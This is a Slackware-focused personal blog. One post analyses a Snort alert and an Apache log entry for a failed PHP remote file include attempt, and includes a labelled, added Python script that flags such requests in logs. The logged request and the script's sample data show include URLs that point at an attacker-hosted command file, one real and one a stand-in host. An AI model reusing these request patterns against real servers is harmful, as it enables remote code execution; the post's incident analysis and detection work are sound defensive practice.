Tuesday, April 25, 2006

wigglit.ath.cx and linode.com

I've a server that is hosted by Linode.com at wigglit.ath.cx. It runs Slackware. Linode.com lets you install prepackaged images of various distributions. It's very stable, and I run multiple services on this machine, but mainly serve web pages.

I've IPTables implemented, along with Snort.

Today, I checked my Snort logs and saw the below:

[**] [1:2002:5] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
04/25-04:08:55.986986 125.243.112.130:57953 -> 66.160.141.30:80
TCP TTL:52 TOS:0x0 ID:10968 IpLen:20 DgmLen:680 DF
***AP*** Seq: 0x80425805 Ack: 0xC7958537 Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1905554218 12987212

I could have checked the actual payload of this specific event, but I was a bit lazy and decided to check the web logs instead. I'm seasoned enough as a security analyst to know that this was probably the typical attack on PHP-based services running on a webserver, but I wanted to see what actually triggered this event, so I went to my web logs and grepped for the IP:

root@starchild:/var/log/apache# cat access_log | grep '125.243.112.130'
125.243.112.130 - - [25/Apr/2006:04:08:55 -0400] "GET /slackware_botlogs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.linuxsystems.go.ro/cmd.txt?&cmd HTTP/1.0" 404 333

I know this attack wasn't successful, for the following reasons:

1. I don't have PHP on this server.
2. I don't have a PHP-based content management system installed.
3. I observed a '404' within that log entry.

This attack was most likely either a worm (Lupper or Lupper-based) or someone who wasn't quite smart enough to know that I wasn't running PHP-based services. It/he/she was attempting to get into the administrative interface and possibly deface the website.
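The check I did by hand above (find the source IP in the access log, look at the query string for a remote URL being passed to a script parameter, and read the status code) as a small script. This is an added example, not code from the original post; the first log line is the one from the post joined onto a single line, the other two are constructed, and the "needs_review" flag only marks 2xx answers for a closer look, since a 404 (as here) means the targeted script does not exist.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common log format: client ident user [time] "METHOD target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample: the request from the post (joined to one line), a benign hit,
# and a made-up URL-encoded variant that was answered with 200.
SAMPLE_LOG = [
    '125.243.112.130 - - [25/Apr/2006:04:08:55 -0400] "GET /slackware_botlogs/modules/'
    'PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.linuxsystems.go.ro/'
    'cmd.txt?&cmd HTTP/1.0" 404 333',
    '10.0.0.5 - - [25/Apr/2006:04:10:01 -0400] "GET /index.html HTTP/1.1" 200 1043',
    '198.51.100.7 - - [25/Apr/2006:05:12:33 -0400] "GET /forum/includes/'
    'functions_admin.php?phpbb_root_path=http%3A%2F%2Fevil.example%2Fcmd.txt HTTP/1.0" 200 512',
]

def find_remote_includes(lines):
    """Return one finding per request whose query string passes a remote URL
    to a script parameter, the shape of a PHP remote file include attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a request line we understand
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes values; keep_blank_values keeps the bare 'cmd'
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                findings.append({
                    "ip": m["ip"],
                    "time": m["time"],
                    "script": parts.path,
                    "param": name,
                    "remote_url": value,
                    "status": int(m["status"]),
                    # 404: the targeted script is not there (the post's case);
                    # 2xx: the script answered, so the include path deserves a closer look
                    "needs_review": m["status"].startswith("2"),
                })
    return findings

if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['script']} {f['param']}={f['remote_url']} "
              f"-> {f['status']} {'REVIEW' if f['needs_review'] else 'no such script'}")
```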

I wget'd the file below from http://www.linuxsystems.go.ro/cmd.txt, which is apparently what the attacker tried to upload to my machine:

[I'll add the content when I can figure out how to add the code without blogger.com attempting to process it...and besides, I'm at work now.]

This is nasty stuff, if your machine isn't hardened.

Wednesday, March 29, 2006

Slackware v11.0 Preorder

Slackware is offering Slackware v11.0 for preorder. This probably means that v11.0 will be released to the public soon. I'm still running a version of Slackware-current that is a few months out of date, but my goal is to update to the latest soon, so I can be as current as possible for v11.0 (not that it makes a real difference).

Also, for those of you who don't update your Slackware installation much, you need to become familiar with this page: Slackware's Security Advisories.


Lastly, for you guys and gals who want to run firewalls on your machines, I've finally got IPTABLES running on Wigglit.ath.cx, using Arno's Firewall Script. This script is very intuitive, and you can customize it to your server's needs. I highly recommend at least giving the script a try.

Sunday, May 22, 2005

Goblinx

There's an obscure (not well known) Slackware-based live CD called Goblinx that may be of interest to a few. I've not tried this distribution yet, but will soon.

I'm interested in how it compares to Slax. I've used Slax off and on, and even a few times at work as a rescue CD. There's also a security-oriented version (formerly Whoppix) called Whax (http://iwhax.net/): Whoppix was based on Knoppix and Whax is based on Slax, which is based on Slackware. They are the same authors who developed Whoppix, but they changed the base distribution and the name of their product.

If anyone has tried both of these, I'm interested in a comparison of the two and a listing of their pros and cons relative to each other.

Lastly, there's also Stratux. For more info (there's nothing but a torrent file on its site), visit ##slackware or #stratux on irc.freenode.net.

New Blog

Hi all. This is my 4th blog. I try to divide subject matter by blog to make it easier to read my posts.

This blog will focus on the Slackware Linux distribution. I also have a Slackware Package blog and may attempt to consolidate that one and this one in the future.

Anyways, enjoy!